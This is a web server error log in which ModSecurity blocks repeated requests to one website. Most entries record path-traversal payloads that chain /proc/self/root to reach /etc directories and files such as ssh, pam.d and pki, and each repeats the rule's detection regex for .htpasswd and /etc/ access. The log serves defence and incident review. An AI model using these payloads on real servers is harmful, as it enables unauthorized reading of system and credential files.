[Mon Mar 16 12:51:28.055299 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.243.203:58354] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnAP9ocpUE4ed4uDzvQQAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:51:34.458170 2026] [:error] [pid 11972:tid 140411582465792] [client 74.7.243.203:58368] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnBpqj1wV0Si-OkefumgAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:51:35.765583 2026] [:error] [pid 21533:tid 140411691570944] [client 74.7.243.203:33682] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnB3jZBu2q05ozVU9YGgAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:51:45.994155 2026] [:error] [pid 32654:tid 140411716749056] [client 74.7.228.16:37660] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgnEAlT9VtDQc7bgUyybQAAAQM"]
[Mon Mar 16 12:52:01.680801 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.243.203:33688] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnIbABkC4fWIHEf8HrqAAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:52:14.286955 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.243.203:45282] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnLv9ocpUE4ed4uDzveQAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:52:29.750361 2026] [:error] [pid 10709:tid 140411582465792] [client 74.7.243.203:33242] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnPRXjF1vJNtV6CWr2vwAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:52:32.247945 2026] [:error] [pid 10709:tid 140411565680384] [client 74.7.243.203:54220] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnQBXjF1vJNtV6CWr2wgAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:52:33.111532 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.241.46:52114] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnQf9ocpUE4ed4uDzvjgAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:52:33.552980 2026] [:error] [pid 21946:tid 140411624429312] [client 74.7.243.203:54236] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnQXbQATo66fKoS7xP9AAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:52:35.979746 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.243.203:54240] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnQ46lpbStxTqkSkts8QAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:52:54.608074 2026] [:error] [pid 21946:tid 140411607643904] [client 74.7.241.46:42176] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnVnbQATo66fKoS7xQDAAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:52:55.846544 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.243.203:54254] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnV7ABkC4fWIHEf8HrwAAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:52:58.583439 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.241.46:41102] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnWo6lpbStxTqkSkts_QAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:52:59.424474 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.243.203:48604] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnW46lpbStxTqkSkts_wAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:53:00.735033 2026] [:error] [pid 32654:tid 140411607643904] [client 74.7.243.203:54030] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnXAlT9VtDQc7bgUyyewAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:53:04.178125 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.243.203:54036] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnYLABkC4fWIHEf8HrwwAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:53:09.027048 2026] [:error] [pid 11972:tid 140411716749056] [client 74.7.243.203:54040] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnZZqj1wV0Si-OkefusAAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:53:12.674963 2026] [:error] [pid 10709:tid 140411607643904] [client 74.7.243.203:38196] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnZhXjF1vJNtV6CWr22AAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:53:33.271890 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.243.203:38208] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnff9ocpUE4ed4uDzvrgAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:53:34.594704 2026] [:error] [pid 10709:tid 140411699963648] [client 74.7.243.203:58430] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnfhXjF1vJNtV6CWr24QAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:53:38.508662 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.243.203:58436] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgngglT9VtDQc7bgUyymwAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
